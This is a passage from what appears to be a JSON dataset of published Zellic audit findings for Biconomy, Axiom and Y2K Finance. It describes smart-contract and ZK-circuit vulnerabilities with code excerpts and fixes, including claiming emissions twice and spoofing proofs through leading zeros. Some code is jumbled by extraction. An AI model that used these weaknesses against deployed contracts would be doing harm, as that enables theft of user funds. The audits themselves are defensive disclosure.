The functions ShamirMultJacobian and _preComputeJacobianPoints use (0, 0, 0) with the intention to represent the point at infinity in Jacobian coordinates. However, this is not a valid point in Jacobian coordinates. The point at infinity is represented in Jacobian coordinates as (c^2, c^3, 0), with 0 < c < p and exponentiation done modulo p.[4] As _affineFromJacobian and _jAdd check for an argument being the point at infinity by only comparing the last component with 0, they work as intended anyway. The function _modifiedJacobianDouble will return (0,0,0) if passed (0,0,0). Results are thus currently correct if (0,0,0) is treated as an alias for the point at infinity. Consider changing (0,0,0) to (1,1,0) in the two places; or, if it is preferred to keep (0,0,0) as an efficiency trick to save gas, document that this is intentional and that functions such as _jAdd, _modifiedJacobianDouble, and _affineFromJacobian must treat (0,0,0) as the point at infinity. In the latter case, we recommend adding test cases for this as well. This issue has been acknowledged by Biconomy Labs, and fixes were implemented in the following commits: f7e03db2, 55d6e09c, 43525074.

[4] p refers to the prime over which the elliptic curve is defined.
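To make the convention concrete, here is a minimal sketch of the affine conversion (hypothetical helper names; modInverse is an assumed modular-inverse routine and P the field prime, neither taken from the code under review). A Jacobian triple (X, Y, Z) maps to the affine point (X/Z^2, Y/Z^3), so any triple with Z == 0 has no affine image and must be special-cased as the point at infinity:

function affineFromJacobian(uint256 x, uint256 y, uint256 z) internal pure returns (uint256, uint256) {
    if (z == 0) return (0, 0); // (0,0) used as the affine alias for the point at infinity
    uint256 zInv = modInverse(z, P); // assumed helper computing z^-1 mod P
    uint256 zInv2 = mulmod(zInv, zInv, P);
    return (mulmod(x, zInv2, P), mulmod(y, mulmod(zInv2, zInv, P), P));
}

This is why only the Z component needs to be compared with zero, and why any triple of the form (c^2, c^3, 0) behaves identically as far as these checks are concerned.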
",
    "html_url": "https://github.com/Zellic/publications/blob/master/Biconomy Secp256r1 - Zellic Audit Report.pdf"
  },
  {
    "title": "3.1 The verify_field_hash function has incorrect Merkle proof\u2013verification logic",
    "labels": [
      "Zellic"
    ],
    "body": "Target: src/ssz/mod.rs
Category: Coding Mistakes
Likelihood: High
Severity: High
Impact: High

The verify_field_hash function, which aims to verify the value of a field at a certain position in an SSZ structure, takes an SSZ inclusion proof along with the maximum number of fields and the field index, then shows that the claimed value is included at the specified index. The index can be proved by matching its bit representation with the direction values provided in the Merkle proof. However, the given code matches the direction values with the byte representation of the index instead of the bit representation. This is shown below.

pub fn verify_field_hash(
    &self,
    ctx: &mut Context,
    field_num: AssignedValue,
    max_fields: usize,
    proof: SSZInputAssigned,
) -> SSZInclusionWitness {
    assert!(max_fields > 0);
    let log_max_fields = log2(max_fields);
    self.range().check_less_than_safe(ctx, field_num, max_fields as u64);
    let field_num_bytes = uint_to_bytes_be(ctx, self.range(), &field_num, log_max_fields as usize); // byte representation
    let witness = self.verify_inclusion_proof(ctx, proof);
    let bad_depth = self.range().is_less_than_safe(ctx, witness.depth, log_max_fields as u64);
    self.gate().assert_is_const(ctx, &bad_depth, &F::from(0));
We have moved these constants to axiom-query in the second audit: axiom-query 2. In a subsequent PR, we added max_trie_depth to core_params for Account, Storage, Transaction, and Receipt subquery circuits, so they are accurately recorded as circuit configuration parameters. Zellic Axiom In production, we will use the following max_trie_depth\u2019s: Account(state) trie: 14 Storage trie: 13 Transaction trie: 6 Receipt trie: 6 For account and storage, these max depths were determined by running an anal- ysis on a Geth full node: https://hackmd.io/@axiom/BJBledudT. Zellic Axiom", + "html_url": "https://github.com/Zellic/publications/blob/master/Axiom October - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Function new_from_bytes in src/ssz/types.rs is incorrect", + "labels": [ + "Zellic" + ], + "body": "Target: src/ssz/types.rs Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The new_from_bytes function in SszBasicTypeList takes a vector of AssignedBytes< F> and the len to create a new SszBasicTypeList. To do so, it computes the pre_len array, which represents whether or not the current index is less than the len value. The point of computing this array, as shown in other functions such as new_mask, is that the value can be multiplied by the pre_len array to force all values at index no less than len to be equal to zero. This is shown in the code below. pub fn new_mask( ctx: &mut Context, range: &RangeChip, values: Vec), int_bit_size: usize, len: AssignedValue, ) -> Self { /) ...)) for j in 0.)values.len() { let mut new_bytes = Vec:)new(); for i in 0.)int_byte_size { let val = range.gate().mul(ctx, values[j].value()[i], pre_len[j]); new_bytes.push(val); } let new_basic = SszBasicType:)new(ctx, range, new_bytes, int_bit_size); new_list.push(new_basic); } /) ...)) } Here, we see that all bytes in the values[j].value() are multiplied with pre_len[j] correctly. However, in the new_from_bytes function, this is handled incorrectly. Zellic Axiom pub fn new_from_bytes( ctx: &mut Context, range: &RangeChip, vals: Vec), int_bit_size: usize, len: AssignedValue, ) -> Self { /) ...)) for value in vals { let mut new_value = Vec:)new(); for i in 0.)32 { let new_val = range.gate.mul(ctx, value[i], pre_len[i]); new_value.push(new_val); } let basic_type = SszBasicType:)new(ctx, range, new_value, int_bit_size); values.push(basic_type); } /) ...)) } Here, we see that value[i], which is the ith byte of a single AssignedBytes instance, is multiplied with the pre_len[i], which is incorrect. We also note that the pre_len array is initialized with the length values.len(), which is zero. pub fn new_from_bytes( ctx: &mut Context, range: &RangeChip, vals: Vec), int_bit_size: usize, len: AssignedValue, ) -> Self { /) ...)) let mut values = Vec:)new(); /) safety constraints? let len_minus_one = range.gate.dec(ctx, len); let len_minus_one_indicator = range.gate.idx_to_indicator(ctx, len_minus_one, vals.len()); let zero = ctx.load_zero(); Zellic Axiom let mut pre_len = vec![zero; values.len()]; /) ...)) } To the best of our knowledge, this function is not used anywhere. We recommend removing the new_from_bytes function. This issue has been acknowledged by Axiom, and a fix was implemented in commit 54dabf29. 
Zellic Axiom", + "html_url": "https://github.com/Zellic/publications/blob/master/Axiom October - Zellic Audit Report.pdf" + }, + { + "title": "3.4 The node type of terminal node in MPT is not range checked to be a bit", + "labels": [ + "Zellic" + ], + "body": "Target: src/mpt/mod.rs Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium All inputs to the MPT inclusion/exclusion proof circuit are range checked in parse_mp t_inclusion_phase0 to ensure there is no undefined behavior in functions that expect input witness values to be bytes or boolean values. The node_type for every node in proof is range checked to be a single bit; however, this check is missed for proof.lea f.node_type. for bit in iter:)once(&proof.slot_is_empty) .chain(proof.nodes.iter().map(|node| &node.node_type)) .chain(proof.key_frag.iter().map(|frag| &frag.is_odd)) { } self.gate().assert_bit(ctx, *bit); This missing range check can lead to undefined behavior as proof.leaf.node_type is passed into functions that assume the corresponding argument to be boolean, such as in parse_terminal_node_phase0. self.gate().select(ctx, node_byte, dummy_ext_byte, leaf_bytes.node_type) self.gate().select(ctx, dummy_branch_byte, node_byte, leaf_bytes.node_type) Assert proof.leaf.node_type to be boolean. for bit in iter:)once(&proof.slot_is_empty) .chain(proof.nodes.iter().map(|node| &node.node_type)) .chain(proof.key_frag.iter().map(|frag| &frag.is_odd)) Zellic Axiom .chain(vec![proof.leaf.node_type]) self.gate().assert_bit(ctx, *bit); { } This issue has been acknowledged by Axiom, and a fix was implemented in commit 3ff70a54. Zellic Axiom", + "html_url": "https://github.com/Zellic/publications/blob/master/Axiom October - Zellic Audit Report.pdf" + }, + { + "title": "3.5 No leading zero check in rlp(idx) leads to soundness bug in transaction circuit", + "labels": [ + "Zellic" + ], + "body": "Target: src/transaction/mod.rs Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The transaction trie maps rlp(transaction_index) to the rlp(transaction) or TxType | rlp(transaction), depending on whether the transaction is a legacy transaction or not. One of the goals of the transaction circuit is to validate whether transaction_ind ex exists in the trie or not. To do so, the circuit validates that the key_bytes of the MPTProof structure is equal to the RLP-encoded transaction_index. This is done as follows \u2014 first, the key_byt es is RLP decoded. Then, the decoded bytes are evaluated as an integer. Then, the evaluated value is constrained to be equal to the transaction_index. pub fn parse_transaction_proof_phase0( &self, ctx: &mut Context, input: EthTransactionInputAssigned, ) -> EthTransactionWitness { /) ...)) /) check key is rlp(idx): /) given rlp(idx), parse idx as var len bytes let idx_witness = self.rlp().decompose_rlp_field_phase0( ctx, proof.key_bytes.clone(), TRANSACTION_IDX_MAX_LEN, ); /) evaluate idx to number let tx_idx = evaluate_byte_array(ctx, self.gate(), &idx_witness.field_cells, idx_witness.field_len); /) check idx equals provided transaction_index from input ctx.constrain_equal(&tx_idx, &transaction_index); /) ...)) } Zellic Axiom Here, the TRANSACTION_IDX_MAX_LEN is set to 2. This may cause an issue, as there is no check that the RLP-decoded bytes have no leading zeros. In the case where transac tion_index = 4, the actual transaction is stored in the key rlp(0x04). However, one can set the key_bytes as rlp(0x0004) and it would still satisfy all the constraints. 
The issue is that there would not be any value corresponding to the key rlp(0x0004 ), so even when there is actually a transaction with index 4, it would be possible to prove that there is no such a transaction. A similar issue is also present in the receipt circuit. This can be used create a fake proof that a block has an incorrect number of transac- tions. Suppose that there are actually 20 transactions in a block. One can prove that a transaction with index 4 exists in the block as usual, then prove that a transaction with index 5 does not exist in the block using the vulnerability we describe above. This is sufficient to prove that there are only five transactions in the block. We recommend adding a padding check to the RLP decomposition. This issue has been acknowledged by Axiom, and a fix was implemented in commit f3b1130e. Zellic Axiom", + "html_url": "https://github.com/Zellic/publications/blob/master/Axiom October - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Emissions can be claimed multiple times", + "labels": [ + "Zellic" + ], + "body": "Target: StrategyVault Category: Business Logic Likelihood: High Severity: Critical : Critical The function claimEmissions can be used by users to claim Y2K emissions. This func- tion uses the correct vault balance of users to calculate the accumulated emissions and then subtracts the emission debt to find out the amount of emission tokens to be transferred to the users. function claimEmissions(address receiver) external returns (uint256 emissions) { } int256 accEmissions = int256( (balanceOf[msg.sender] * accEmissionPerShare) / PRECISION ); emissions = uint256(accEmissions - userEmissionDebt[msg.sender]); userEmissionDebt[msg.sender] = accEmissions; if (emissions > 0) emissionToken.safeTransfer(receiver, emissions); emit EmissionsClaimed(msg.sender, receiver, emissions); A user can also transfer their vault tokens to another account after calling claimEmis sions. As the emission debt is not transferred along with the vault balance, they can call claimEmissions again using their other account and claim these emissions again. This process can be repeated multiple times, effectively draining all the emission to- kens from the StrategyVault contract. All the emission tokens can be drained out of the contract. Zellic Y2K Finance While transferring tokens using the functions transfer and transferFrom, it is impor- tant to update the userEmissionDebt mapping using the function _updateUserEmissio ns. To do this, override the _transfer function, which is called in both transfer and tran sferFrom functions, to add the following additional logic. function _transfer(address sender, address recipient, uint256 amount) internal virtual override { _updateUserEmissions(sender,amount,false); _updateUserEmissions(recipient,amount,true); super._transfer(sender, recipient, amount); } The issue was fixed in commit dd5470d and 7a57688. Zellic Y2K Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Y2K Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.2 The value of queuedWithdrawalTvl can be artificially inflated", + "labels": [ + "Zellic" + ], + "body": "Target: StrategyVault Category: Business Logic Likelihood: High Severity: High : High The value of queuedWithdrawalTvl can be artificially inflated, which might revert the transactions calling fetchDeployAmounts or deployPosition in StrategyVault and _borr ow in the HookAaveFixYield and HookAave contracts. 
When a user calls requestWithdrawal, the value of totalQueuedShares[deployId] is increased by the amount of shares. The user can then transfer their funds to another wallet and call requestWithdrawal again, which would increase the totalQueuedShare s[deployId] for the second time. This can be repeated multiple times to artificially increase the value of totalQueuedSh ares[deployId]. When the owner closes this position using closePosition, this value will be added to queuedWithdrawalTvl, thus increasing its value more than intended. If the value of queuedWithdrawalTvl becomes greater than totalAssets() after a suc- cessful exploit, it will revert the function call fetchDeployAmounts and deployPosition in the StrategyVault contract due to integer underflow. This would also revert any call to availableUnderlying, which is called in _borrow in the hook contract. Certain function calls would revert, and new positions cannot be deployed. When a user requests withdrawal using the requestWithdrawal, these funds should not be allowed to be transferred to other wallets. An additional check can be implemented in the _transfer function that checks that no more than balanceOf[sender] - withdrawQueue[sender].shares are transferred from the sender\u2019s address. function _transfer(address sender, address recipient, uint256 amount) internal virtual override { require(balanceOf[sender] - withdrawQueue[sender].shares > amount,\u201dNot enough funds\u201d); Zellic Y2K Finance _updateUserEmissions(sender,amount,false); _updateUserEmissions(recipient,amount,true); super._transfer(sender, recipient, amount); } The issue was fixed in commit 11f6797. Zellic Y2K Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Y2K Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.3 The lack of token addresses\u2019 verification", + "labels": [ + "Zellic" + ], + "body": "Target: zapFrom Category: Coding Mistakes Likelihood: Low Severity: High : High The permitSwapAndBridge and swapAndBridge functions allow users to perform the swap, and after that, bridge the resulting tokens to another chain using Stargate, which is a decentralised bridge and exchange building on top of the Layer Zero protocol. These functions have the following parameters: swapPayload, receivedToken, and _s rcPoolId. The swapPayload parameter contains all the necessary data for the swap, including the path array with the list of tokens involved in the swap process. It is assumed that the final address of the token participating in the swap will be used for cross-chain swap. The receivedToken token address will be used by the _bridge function for assigning the approval for the stargateRouter contract. Besides that, the user controls the _srcPoolId parameter, which determines the pool address, which is associated with a specific token and will hold the assets of the tokens that will be transferred from the current contact inside stargateRouter. However, there is no verification that these three addresses \u2013 receivedToken, the last address in path and pool.token() \u2013 match each other. When using native tokens, the user should pass the wethAddress address as received Token because before _bridge, the necessary amount of tokens should be withdrawn from the weth contract. After that, the receivedToken will be rewritten to zero address. Currently there is no verification that the receivedToken is not zero initially. 
function swapAndBridge( uint amountIn, address fromToken, address receivedToken, uint16 srcPoolId, uint16 dstPoolId, bytes1 dexId, bytes calldata swapPayload, bytes calldata bridgePayload ) external payable { _checkConditions(amountIn); Zellic Y2K Finance ERC20(fromToken).safeTransferFrom(msg.sender, address(this), amountIn); uint256 receivedAmount; if (dexId !) 0x05) { receivedAmount = _swap(dexId, amountIn, swapPayload); } else { ERC20(fromToken).safeApprove(balancerVault, amountIn); receivedAmount = _swapBalancer(swapPayload); } if (receivedToken =) wethAddress) { WETH(wethAddress).withdraw(receivedAmount); receivedToken = address(0); } _bridge( receivedAmount, receivedToken, srcPoolId, dstPoolId, bridgePayload ); } function _bridge( uint amountIn, address fromToken, uint16 srcPoolId, uint16 dstPoolId, bytes calldata payload ) private { if (fromToken =) address(0)) { /) NOTE: If sending after swap to ETH then msg.value will be < amountIn as it only contains the fee If sending without swap msg.value will be > amountIn as it contains both fee + amountIn **/ uint256 msgValue = msg.value > amountIn ? msg.value : amountIn + msg.value; Zellic Y2K Finance IStargateRouter(stargateRouterEth).swapETHAndCall{value: msgValue}(...))); ...)) } ...)) } Due to the lack of verification that the receivedToken address matches the last ad- dress in the path array and pool.token() address, users are able to employ any token address as the receivedToken. This potentially allows them to successfully execute cross-chain swaps using tokens owned by the contract. In instances where a user initially sets the receivedToken address to the zero address, the required amount of tokens will not be withdrawn from the weth contract. Conse- quently, the contract will attempt to transfer to the stargateRouter contract the funds present in its balance before the transaction took place. In both scenarios, if the contract possesses any tokens, they can be utilized instead of the tokens received during the execution of the swap. This also leads to a problem in the _bridge function during msgValue calculation. When the fromToken (receivedToken from swapAndBridge) is not the outcome of a swap, users can specify any amountIn as the result of a swap involving a different token. This am ountIn value will then be used as the ETH value. Consequently, if the contract holds other funds, they will be sent to stargateRouterEth along with the user\u2019s fee. We recommend to add the check that the receivedToken and the last address in path and pool.token() match each other \u2014 and also that the receivedToken address is not equal to zero address. This issue has been acknowledged by Y2K Finance, and a fix was implemented in commit 5f79149. Zellic Y2K Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Y2K Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.4 The lack of verification of the payload data", + "labels": [ + "Zellic" + ], + "body": "Target: zapFrom Category: Coding Mistakes Likelihood: High Severity: High : High Within the functions bridge, permitSwapAndBridge, and swapAndBridge, there is a lack of validation for the payload or bridgePayload data provided by users, which is trans- mitted to the stargateRouter contract for subsequent transmission to the destination chain. The sgReceive function expects that _payload will include the receiver address, the vault\u2019s epoch id, and the vaultAddress. 
However, if the data type mismatches the expected format, the refund process using the _stageRefund function will not occur as the function call will result in a revert. function sgReceive( uint16 _chainId, bytes memory _srcAddress, uint256 _nonce, address _token, uint256 amountLD, bytes calldata _payload ) external payable override { if (msg.sender !) stargateRelayer &) msg.sender !) stargateRelayerEth) revert InvalidCaller(); (address receiver, uint256 id, address vaultAddress) = abi.decode( _payload, (address, uint256, address) ); if (id =) 0) return _stageRefund(receiver, _token, amountLD); if (whitelistedVault[vaultAddress] !) 1) return _stageRefund(receiver, _token, amountLD); bool success = _depositToVault(id, amountLD, _token, vaultAddress); if (!success) return _stageRefund(receiver, _token, amountLD); receiverToVaultToIdToAmount[receiver][vaultAddress][id] += amountLD; emit ReceivedDeposit(_token, address(this), amountLD); } Zellic Y2K Finance The absence of proper payload validation exposes the system to potential issues, as incorrect or malformed payloads could cause the subsequent sgReceive function call from the zapDest contract to revert. Such reverts could lead to locked funds and hinder the expected behavior of the system. Instead of accepting raw payload data from users, we recommend encoding the pay- load data directly inside the functions bridge, permitSwapAndBridge, and swapAndBrid ge. This ensures that the payload is created according to the expected format and reduces the likelihood of incorrect payloads causing reverts of calls in the destination contract. If the payload must be provided by users, we recommend to implement robust input validation mechanisms to ensure that only valid and properly formatted payloads are accepted. This issue has been acknowledged by Y2K Finance, and a fix was implemented in commit 56a1461. Zellic Y2K Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Y2K Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Incorrect loop implementation in the function clearQueued Deposits", + "labels": [ + "Zellic" + ], + "body": "Target: StrategyVault Category: Coding Mistakes Likelihood: Medium Severity: Low : Low The function clearQueuedDeposits is used to clear a fixed amount of deposits in the queue. This function loops through the queueDeposits mapping and pops the last el- ement of the array while minting shares to the expected receivers in that mapping. The issue is that the array indexing used to access queueDeposits is incorrect because the array index will be out of bound in many cases. Shown below is the relevant part of the code: function clearQueuedDeposits( uint256 queueSize ) external onlyOwner returns (uint256 pulledAmount) { /)...)) for (uint256 i = depositLength - queueSize; i < queueSize; ) { QueueDeposit memory qDeposit = queueDeposits[queueSize - i - 1]; uint256 shares = qDeposit.assets.mulDivDown( cachedSupply, cachedAssets ); In many cases the function might revert. Consider changing the code to the following: function clearQueuedDeposits( uint256 queueSize ) external onlyOwner returns (uint256 pulledAmount) { /)...)) for (uint256 i = depositLength; i > depositLength - queueSize; ) { Zellic Y2K Finance QueueDeposit memory qDeposit = queueDeposits[i - 1]; /)...)) unchecked { i-); } The issue was fixed in commit cf415dd. 
Zellic Y2K Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Y2K Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.6 Lack of data validation for trustedRemoteLookup", + "labels": [ + "Zellic" + ], + "body": "Target: zapDest Category: Coding Mistakes Likelihood: Low Severity: Informational : Informational The current implementation of the lzReceive function lacks checks to verify the va- lidity of the data stored in trustedRemoteLookup[_srcChainId] and _srcAddress bytes. If trustedRemoteLookup[_srcChainId] is not set and _srcAddress is zero bytes, the re- sult of the check if (keccak256(_srcAddress) !) keccak256(trustedRemoteLookup[_s rcChainId])) will be true because keccak256(\u201c\u201d) =) keccak256(\u201c\u201d). function lzReceive( uint16 _srcChainId, bytes memory _srcAddress, uint64 _nonce, bytes memory _payload ) external override { if (msg.sender !) layerZeroRelayer) revert InvalidCaller(); if ( keccak256(_srcAddress) !) keccak256(trustedRemoteLookup[_srcChainId]) ) revert InvalidCaller(); ...)) } The issue currently has no security impact, because it is not expected that the layerZe- roRelayer contract will send an empty _srcAddress. But limiting a contract\u2019s attack surface is a crucial way to mitigate future risks. To ensure data consistency and avoid potential issues, it is recommended to add the following checks: trustedRemoteLookup[_srcChainId] > 0 Zellic Y2K Finance _srcAddress.length =) trustedRemoteLookup[_srcChainId].length An example of such checks can be found in the implementation provided by LayerZero Labs here. This issue has been acknowledged by Y2K Finance, and a fix was implemented in commit 32eaca8. Zellic Y2K Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Y2K Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.7 Array out-of-bound exception in _removeVaults", + "labels": [ + "Zellic" + ], + "body": "Target: StrategyVault Category: Coding Mistakes Likelihood: Medium Severity: Low : Low The function _removeVaults is a helper function that removes vaults from the vaultLi st. While removing a vault from the middle of the array, it is intended to replace the vault at the last index with the vault to be removed and pop the last vault. The index of the last element of the array should be removeCount - 1 (where removeCo unt = vaults.length), but the function is using the last element as removeCount \u2014 due to which it will revert because it would access element out-of-bounds of the array. Shown below is the relevant part of the code: function _removeVaults( address[] memory vaults ) internal returns (address[] memory newVaultList) { /)...)) } else { if (vaults.length > 1) { vaults[j] = vaults[removeCount]; delete vaults[removeCount]; } else delete vaults[j]; removeCount-); } /)...)) The _removeVaults function would revert in certain cases. Use the correct last array index removeCount - 1 instead of removeCount: function _removeVaults( address[] memory vaults Zellic Y2K Finance ) internal returns (address[] memory newVaultList) { /)...)) } else { if (vaults.length > 1) { vaults[j] = vaults[removeCount]; delete vaults[removeCount]; vaults[j] = vaults[removeCount - 1]; delete vaults[removeCount - 1]; } else delete vaults[j]; removeCount-); } /)...)) The issue was fixed in commit fd2a6f3. 
",
    "html_url": "https://github.com/Zellic/publications/blob/master/Y2K Finance - Zellic Audit Report.pdf"
  },
  {
    "title": "3.6 Lack of data validation for trustedRemoteLookup",
    "labels": [
      "Zellic"
    ],
    "body": "Target: zapDest
Category: Coding Mistakes
Likelihood: Low
Severity: Informational
Impact: Informational

The current implementation of the lzReceive function lacks checks to verify the validity of the data stored in trustedRemoteLookup[_srcChainId] and the _srcAddress bytes. If trustedRemoteLookup[_srcChainId] is not set and _srcAddress is zero bytes, the check if (keccak256(_srcAddress) != keccak256(trustedRemoteLookup[_srcChainId])) will pass because keccak256(\"\") == keccak256(\"\").

function lzReceive(
    uint16 _srcChainId,
    bytes memory _srcAddress,
    uint64 _nonce,
    bytes memory _payload
) external override {
    if (msg.sender != layerZeroRelayer) revert InvalidCaller();
    if (
        keccak256(_srcAddress) != keccak256(trustedRemoteLookup[_srcChainId])
    ) revert InvalidCaller();
    ...
}

The issue currently has no security impact, because it is not expected that the layerZeroRelayer contract will send an empty _srcAddress. But limiting a contract's attack surface is a crucial way to mitigate future risks. To ensure data consistency and avoid potential issues, it is recommended to add the following checks:

trustedRemoteLookup[_srcChainId].length > 0
_srcAddress.length == trustedRemoteLookup[_srcChainId].length

An example of such checks can be found in the implementation provided by LayerZero Labs here. This issue has been acknowledged by Y2K Finance, and a fix was implemented in commit 32eaca8.",
    "html_url": "https://github.com/Zellic/publications/blob/master/Y2K Finance - Zellic Audit Report.pdf"
  },
  {
    "title": "3.7 Array out-of-bound exception in _removeVaults",
    "labels": [
      "Zellic"
    ],
    "body": "Target: StrategyVault
Category: Coding Mistakes
Likelihood: Medium
Severity: Low
Impact: Low

The function _removeVaults is a helper function that removes vaults from the vaultList. While removing a vault from the middle of the array, it is intended to overwrite the vault being removed with the vault at the last index and then delete the last slot. The index of the last element of the array should be removeCount - 1 (where removeCount = vaults.length), but the function uses removeCount as the last index, due to which it will revert because it would access an element out of bounds of the array. Shown below is the relevant part of the code:

function _removeVaults(
    address[] memory vaults
) internal returns (address[] memory newVaultList) {
    // ...
    } else {
        if (vaults.length > 1) {
            vaults[j] = vaults[removeCount];
            delete vaults[removeCount];
        } else delete vaults[j];
        removeCount--;
    }
    // ...

The _removeVaults function would revert in certain cases. Use the correct last array index removeCount - 1 instead of removeCount:

function _removeVaults(
    address[] memory vaults
) internal returns (address[] memory newVaultList) {
    // ...
    } else {
        if (vaults.length > 1) {
            vaults[j] = vaults[removeCount - 1];
            delete vaults[removeCount - 1];
        } else delete vaults[j];
        removeCount--;
    }
    // ...

The issue was fixed in commit fd2a6f3.
",
    "html_url": "https://github.com/Zellic/publications/blob/master/Y2K Finance - Zellic Audit Report.pdf"
  },
  {
    "title": "3.8 The function _removeVaults returns early",
    "labels": [
      "Zellic"
    ],
    "body": "Target: StrategyVault
Category: Coding Mistakes
Likelihood: Medium
Severity: Low
Impact: Low

The function _removeVaults is a helper function that removes vaults from the vaultList. While removing the vaults, it runs two loops, but the return statement is inside the first loop, due to which the function returns after the first iteration of the first loop. The intended functionality is to return after both loops have finished. The _removeVaults function would return early, and not all of the vaults would be removed from the list as intended. Move the two lines outside of the loop:

function _removeVaults(
    address[] memory vaults
) internal returns (address[] memory newVaultList) {
    uint256 removeCount = vaults.length;
    newVaultList = vaultList;
    for (uint256 i; i < newVaultList.length; ) {
        for (uint j; j < removeCount; ) {
            if (vaults[j] == newVaultList[i]) {
                // Deleting the removeVault from the list
                if (j == removeCount) {
                    delete vaults[j];
                    removeCount--;
                } else {
                    if (vaults.length > 1) {
                        vaults[j] = vaults[removeCount];
                        delete vaults[removeCount];
                    } else delete vaults[j];
                    removeCount--;
                }
                // Deleting the vault from the newVaultList list
                if (
                    newVaultList[i] == newVaultList[newVaultList.length - 1]
                ) {
                    delete newVaultList[i];
                } else {
                    newVaultList[i] = newVaultList[newVaultList.length - 1];
                    delete newVaultList[newVaultList.length - 1];
                }
            }
            unchecked {
                j++;
            }
        }
        unchecked {
            i++;
        }
        vaultList = newVaultList; // remove these two lines from inside the loop...
        return newVaultList;
    }
    vaultList = newVaultList; // ...and place them here, after the loop
    return newVaultList;
}

The issue was fixed in commits 945734b and 6bd136c.",
    "html_url": "https://github.com/Zellic/publications/blob/master/Y2K Finance - Zellic Audit Report.pdf"
  },
  {
    "title": "3.9 The weightStrategy range violation",
    "labels": [
      "Zellic"
    ],
    "body": "Target: StrategyVault
Category: Coding Mistakes
Likelihood: Low
Severity: Low
Impact: Low

The weightStrategy global variable determines the weight strategy used when deploying funds and can take one of three values:

1. for equal weight
2. for fixed weight
3. for threshold weight

However, the setWeightStrategy function allows the owner of the contract to set this value to any number less than or equal to strategyCount(), which is equal to 4.

function setWeightStrategy(
    uint8 weightId,
    uint16 proportion,
    uint256[] calldata fixedWeights
) external onlyOwner {
    ...
    if (weightId > strategyCount()) revert InvalidWeightId();
    ...
    weightStrategy = weightId;
    weightProportion = proportion;
    vaultWeights = fixedWeights;
    emit WeightStrategyUpdated(weightId, proportion, fixedWeights);
}

function strategyCount() public pure returns (uint256) {
    return 4;
}

If the weightStrategy is set to 4, the fetchWeights function will revert because there is a check that this value cannot be more than 3. As a result, the deployPosition function, which is called by the owner of the contract, will also revert, preventing the owner from deploying funds to Y2K vaults. We recommend changing the condition from > to >=.

function setWeightStrategy(
    uint8 weightId,
    uint16 proportion,
    uint256[] calldata fixedWeights
) external onlyOwner {
    ...
    if (weightId >= strategyCount()) revert InvalidWeightId();
    ...
}

The issue was fixed in commit 2248d6f.
The amount to be withdrawn is calculated by the following code: function _swapForMissingBorrowToken( address borrowToken, uint256 amountNeeded ) internal { ERC20 depositToken = strategyDepositToken; uint256 exchangeRate = (aaveOracle.getAssetPrice(borrowToken) * 105e16) / aaveOracle.getAssetPrice(address(depositToken)); uint256 amountToWithdraw = ((exchangeRate * amountNeeded) / 1e18); _withdraw(amountToWithdraw, false); _swap(amountToWithdraw, depositToken, 1); } Although this would work if both tokens are of the same decimals, there would be an issue if these tokens (depositToken and borrowToken) are of different decimals. For example, if borrowToken is ETH and depositToken is USDC, and the amountNeeded is 100 ETH, assuming the price of ETH to be $1,200, the value of amountToWithdraw would be calculated as 126,000e18 whereas it should be 126,000e6. The same issue is also present in the _repay function. Zellic Y2K Finance Incorrect decimal conversion might lead to incorrect values during _borrow and _rep ay. Take into account the decimals for all the tokens while such conversions take place. The issue was fixed in commits 80da566 and 0db93f7. Zellic Y2K Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Y2K Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.12 Malicious users can profit due to temporary exchange rate fluctuations", + "labels": [ + "Zellic" + ], + "body": "Target: StrategyVault Category: Business Logic Likelihood: Low Severity: Medium : Medium When a position is closed by calling closePosition, the deposit queue is cleared by pulling funds from the queue contract using the function _pullQueuedDeposits. The function _pullQueuedDeposits is only called when the length of queueDeposits is less than maxQueuePull. If the length of this queueDeposits array is greater than maxQueuePull, the queue is first reduced using the function clearQueuedDeposits. The relevant part of the code is shown below: function closePosition() external onlyOwner { if (!fundsDeployed) revert FundsNotDeployed(); /)...)) fundsDeployed = false; /)...)) uint256 queueLength = queueDeposits.length; if (queueLength > 0 &) queueLength < maxQueuePull) _pullQueuedDeposits(queueLength); } There may be a scenario where either the owner forgets to call the clearQueuedDepos its function before closePosition or a malicious user front-runs the owner\u2019s closeP osition call to increase the length of the queue such that _pullQueuedDeposits is not called. In both these cases, the queue will not be cleared, but fundsDeployed would be set to false. If the owner later tries to clear the queue by calling the function clearQueuedDeposits multiple times, the exchange rate would temporarily fluctuate. This is due to a bug in the function clearQueuedDeposits. While clearing part of the queue, the function pulls all the funds from the QueueCon- tract. At this time, the totalSupply is only increased by a small amount, but totalAss ets is increased by a large amount. The exchange rate would again reach back to the Zellic Y2K Finance expected amount when the entire queue is cleared, but between the calls to clearQ ueuedDeposits, the exchange rate is incorrect. A malicious user can profit by calling withdraw between these calls as they would receive more assets than they should. A malicious user can sell shares at higher price than expected. In the function clearQueuedDeposits, only the assets that are removed from the queue should be pulled from the QueueContract. 
